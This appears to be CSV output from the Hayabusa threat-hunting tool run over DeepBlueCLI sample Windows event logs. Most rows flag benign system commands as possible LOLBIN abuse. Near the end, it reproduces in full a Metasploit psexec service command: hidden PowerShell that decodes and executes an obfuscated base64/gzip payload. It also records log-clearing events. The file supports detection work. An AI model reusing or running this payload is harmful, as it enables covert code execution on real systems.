2016-09-20 12:44:04.653 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0x7dc | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 21:48:41.680 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x23c | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 21:48:42.006 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x9d4 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 21:48:42.440 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\makecab.exe"" C:\Windows\Logs\CBS\CbsPersist_20160920124842.log C:\Windows\Logs\CBS\CbsPersist_20160920124842.cab | Path: C:\Windows\System32\makecab.exe | PID: 0x914 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 21:48:42.724 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xfe0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 21:48:46.672 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\wuauclt.exe"" /RunHandlerComServer | Path: C:\Windows\System32\wuauclt.exe | PID: 0x718 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 21:48:54.436 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xb70 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 22:07:13.234 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: gpscript.exe /Logoff | Path: C:\Windows\System32\gpscript.exe | PID: 0xc20 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 22:07:23.000 +09:00,IE10Win7,6006,info,,Event Log Service Stopped,,rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-09-20 22:07:41.000 +09:00,IE10Win7,6005,info,,Event Log Service Started,,rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-09-20 22:07:43.000 +09:00,IE10Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2016-09-20 22:07:44.179 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\dllhost.exe /Processid:{F3F72FE3-CF58-4A21-BBED-F596E5AFE5C0} | Path: C:\Windows\System32\dllhost.exe | PID: 0x6e8 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 22:07:44.757 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\dllhost.exe /Processid:{02D4B3F1-FD88-11D1-960D-00805FC79235} | Path: C:\Windows\System32\dllhost.exe | PID: 0x1c0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 22:07:58.039 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x9a0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 22:07:58.101 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: gpscript.exe /Logon | Path: C:\Windows\System32\gpscript.exe | PID: 0xa00 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 22:07:59.540 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xb84 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 22:08:00.110 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Wallpaper\autologon.bat"" "" | Path: C:\Windows\System32\cmd.exe | PID: 0xc1c | User: IEUser | LID: 0x6793c",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 22:08:00.615 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\wallpaper\bginfo.exe C:\wallpaper\bgconfig.bgi /timer:0 | Path: C:\Wallpaper\Bginfo.exe | PID: 0xc38 | User: IEUser | LID: 0x6793c,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 22:08:01.982 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xc5c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 22:10:32.160 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\wuauclt.exe"" /RunHandlerComServer | Path: C:\Windows\System32\wuauclt.exe | PID: 0x3a0 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 22:20:59.082 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\RunDll32.exe"" ""C:\Windows\system32\WerConCpl.dll"", LaunchErcApp -responsepester | Path: C:\Windows\System32\rundll32.exe | PID: 0x87c | User: IEUser | LID: 0x6796c",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 22:25:15.535 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\rundll32.exe aepdu.dll,AePduRunUpdate | Path: C:\Windows\System32\rundll32.exe | PID: 0xa00 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 23:02:21.413 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x11c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 23:02:21.475 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x720 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 23:03:25.976 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x824 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 23:03:26.007 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x6b4 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 23:54:49.500 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\rundll32.exe /d acproxy.dll,PerformAutochkOperations | Path: C:\Windows\System32\rundll32.exe | PID: 0xc60 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-21 00:10:43.213 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x72c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-21 00:10:56.112 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xe88 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-21 00:10:56.268 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\511-evtx\Win7-application.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0xaf4 | User: IEUser | LID: 0x6796c",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-21 00:10:56.315 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xad8 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-21 00:10:56.331 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xa30 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-21 00:10:56.346 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\511-evtx\Win7-application.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0x1a8 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-21 00:10:56.377 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /l:""C:\Users\IEUser\Documents\511-evtx\Win7-application.evtx"" | Path: C:\Windows\System32\mmc.exe | PID: 0xd08 | User: IEUser | LID: 0x6793c",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-21 00:45:12.871 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xb34 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-21 00:45:18.574 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x8d4 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-21 00:45:25.147 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x270 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-21 00:46:27.941 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xc90 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-21 00:46:32.738 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x8e0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-21 01:33:53.404 +09:00,IE10Win7,1102,high,Evas,Security Log Cleared,User: IEUser,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-security.evtx
2016-09-21 01:34:04.272 +09:00,IE10Win7,104,high,Evas,System Log File Cleared,User: IEUser,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-system.evtx
2016-09-21 01:35:46.590 +09:00,IE10Win7,7045,high,Persis,Suspicious Service Installed,"Svc: UWdKhYTIQWWJxHfx | Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAGFl4VcCA71WW4/aOhB+bqX+h6hCIlFZEli6N6nScYAAy2Vhw52iI5M4weDEbOJw6+l/PxMge2m31Z4+nAgU2zPjGX/zjSdO5FuCcl+aF8YW77iE9KRvH96/a+MAe5Kcmq0rV5uutY5mopKRUq6rcU625Yd6V3n3DvRS++uRJ32R5AlarUrcw9Sf3twUoyAgvjjOsxUiUBgSb8YoCWVF+kcazElAzu5mC2IJ6ZuU+jtbYXyG2UltV8TWnEhnyLdjWYNbOI4xa64YFXL669e0MjnLTbPlhwizUE6bu1AQL2szllak70rssLtbETndpFbAQ+6I7ID65/lszw+xQ1qw25o0iZhzO0wrcAr4BUREgS8dzhNvcBTLaRi2A24h2w5ICNrZmr/mSyKn/IixjPSXPDl5v498QT0CckECvjJJsKYWCbNV7NuM3BNnKrfIJjn0W43k50ag1RaBkoG8vBJmk9sRI0fLtPJzoC9yqcDzQz4BiO8f3n947ySU8C6CVWtPLxcbhJ+TAkbvJocxgajlNg/pQf+LpGWkJvjHggc7mKa6QUSUqTSJszGZTqWUPeyagdjVM7/eI5cYgPreEMM1h8VJn1N7CkanbKUs9hB7+A3rSsShPintfOxRKyGW/FoOiMPI4cTZRK0FYcnpk4DYJcKIi0WMakaa/GxW9qh4tNUjymwSIAvyGEJUkGLlZTDHRMnpmt8kHiB1nKchHQ7QmSTaJwrvEu/xHJTSRYbDMCO1I6gnKyOZBDNiZyTkh/QkQpHgh2H6KdxmxAS1cCiS7aZKguPJX5H7oQgiC5IHZ++aK2JRzGIoMlKV2kTfmdRN/KZfBaKIGaO+CzutIRGwEgNgipgSAYT4mH4laxJR81aMeKB3KG6DYRdK+VQQBx5hl9jpH6NMCH9kd4xHAsSzGCHJJuMiI/VpIOCOiLE9cunPg3h2RxzCKQbklBQ5qZyJvhMxz1MMF+dHfp4wOiASCEDDCLin45BcFEwRAFbyR/WOFhE8o5rPmpa+pDm0oblaE/49el7jpUu7fruoqkFpO3dQLaw1q+1Sp1otrG/NfkGY5Zqot2uiWR4uFiaq3vdGYlxD1S7VlqPCfnVL92YD2aOterHX9xtN3+4Xru2MSo7jXjrmfe6zQRuDYkfX8rhRKkeNgb7RtUJYpptqh/Y6y1tDzEZ9hnuO6g5z15huG8Gin+PNfQ2hyvzc2t86/cq8ae9GVfV6UFiiMkJFv9w3dF4f6QFqq33s9vmmvqiwgVtEumFRMu70DL3TMXTUqyweSteqC7ZDPNcH/Twdr4b3c5gbEEJd1Qo1m+z5qAMgVTjC7j3ouMW8NXdAp/QJ6Z9aPMzjpc6RDjrG+AHiGq2MNgN5t5fnqM9aQ4wa452hqrlRu4CqGh1UXBRviV29g1G4Lu1Laq5vc3vwuTVy1P6QXaqlYndlOaqqbqqlujXOba/uLgu69lD0qMdmeVu97l3p/qbutteu3Rlc3m9buxn466lq/2PMGqBNavHZu9IuF8/o8Ktrv4mDcI4Z0ATu86RQDR4Ypyu5zWlsIcvPuvWSBD5h0Nyg/SV8R4xxK+4TL65w6FXHDjKF4u3B8Dz/6kiRHhWVpz6SLN3cjCFmqKMjybMN4rtintG255oG97+2LWhw8LeftMhXO/m0WSbuIAleTy7YwYUSl1hqMdg0L5bV1f+B5qnE5/Cy34rm09pvpG9CWMs8IvGT5OXCf8L7D7EYYCpA34Qri5FjA/09JCcuPfsQSVIHXHFOT/wxeBeJsxZ8o/wLs66tlosKAAA=''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-system.evtx
2016-09-21 01:35:46.590 +09:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,"Svc: UWdKhYTIQWWJxHfx | Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAGFl4VcCA71WW4/aOhB+bqX+h6hCIlFZEli6N6nScYAAy2Vhw52iI5M4weDEbOJw6+l/PxMge2m31Z4+nAgU2zPjGX/zjSdO5FuCcl+aF8YW77iE9KRvH96/a+MAe5Kcmq0rV5uutY5mopKRUq6rcU625Yd6V3n3DvRS++uRJ32R5AlarUrcw9Sf3twUoyAgvjjOsxUiUBgSb8YoCWVF+kcazElAzu5mC2IJ6ZuU+jtbYXyG2UltV8TWnEhnyLdjWYNbOI4xa64YFXL669e0MjnLTbPlhwizUE6bu1AQL2szllak70rssLtbETndpFbAQ+6I7ID65/lszw+xQ1qw25o0iZhzO0wrcAr4BUREgS8dzhNvcBTLaRi2A24h2w5ICNrZmr/mSyKn/IixjPSXPDl5v498QT0CckECvjJJsKYWCbNV7NuM3BNnKrfIJjn0W43k50ag1RaBkoG8vBJmk9sRI0fLtPJzoC9yqcDzQz4BiO8f3n947ySU8C6CVWtPLxcbhJ+TAkbvJocxgajlNg/pQf+LpGWkJvjHggc7mKa6QUSUqTSJszGZTqWUPeyagdjVM7/eI5cYgPreEMM1h8VJn1N7CkanbKUs9hB7+A3rSsShPintfOxRKyGW/FoOiMPI4cTZRK0FYcnpk4DYJcKIi0WMakaa/GxW9qh4tNUjymwSIAvyGEJUkGLlZTDHRMnpmt8kHiB1nKchHQ7QmSTaJwrvEu/xHJTSRYbDMCO1I6gnKyOZBDNiZyTkh/QkQpHgh2H6KdxmxAS1cCiS7aZKguPJX5H7oQgiC5IHZ++aK2JRzGIoMlKV2kTfmdRN/KZfBaKIGaO+CzutIRGwEgNgipgSAYT4mH4laxJR81aMeKB3KG6DYRdK+VQQBx5hl9jpH6NMCH9kd4xHAsSzGCHJJuMiI/VpIOCOiLE9cunPg3h2RxzCKQbklBQ5qZyJvhMxz1MMF+dHfp4wOiASCEDDCLin45BcFEwRAFbyR/WOFhE8o5rPmpa+pDm0oblaE/49el7jpUu7fruoqkFpO3dQLaw1q+1Sp1otrG/NfkGY5Zqot2uiWR4uFiaq3vdGYlxD1S7VlqPCfnVL92YD2aOterHX9xtN3+4Xru2MSo7jXjrmfe6zQRuDYkfX8rhRKkeNgb7RtUJYpptqh/Y6y1tDzEZ9hnuO6g5z15huG8Gin+PNfQ2hyvzc2t86/cq8ae9GVfV6UFiiMkJFv9w3dF4f6QFqq33s9vmmvqiwgVtEumFRMu70DL3TMXTUqyweSteqC7ZDPNcH/Twdr4b3c5gbEEJd1Qo1m+z5qAMgVTjC7j3ouMW8NXdAp/QJ6Z9aPMzjpc6RDjrG+AHiGq2MNgN5t5fnqM9aQ4wa452hqrlRu4CqGh1UXBRviV29g1G4Lu1Laq5vc3vwuTVy1P6QXaqlYndlOaqqbqqlujXOba/uLgu69lD0qMdmeVu97l3p/qbutteu3Rlc3m9buxn466lq/2PMGqBNavHZu9IuF8/o8Ktrv4mDcI4Z0ATu86RQDR4Ypyu5zWlsIcvPuvWSBD5h0Nyg/SV8R4xxK+4TL65w6FXHDjKF4u3B8Dz/6kiRHhWVpz6SLN3cjCFmqKMjybMN4rtintG255oG97+2LWhw8LeftMhXO/m0WSbuIAleTy7YwYUSl1hqMdg0L5bV1f+B5qnE5/Cy34rm09pvpG9CWMs8IvGT5OXCf8L7D7EYYCpA34Qri5FjA/09JCcuPfsQSVIHXHFOT/wxeBeJsxZ8o/wLs66tlosKAAA=''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-system.evtx
2016-09-21 01:35:46.590 +09:00,IE10Win7,7045,info,,New Service Installed,"Name: UWdKhYTIQWWJxHfx | Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object 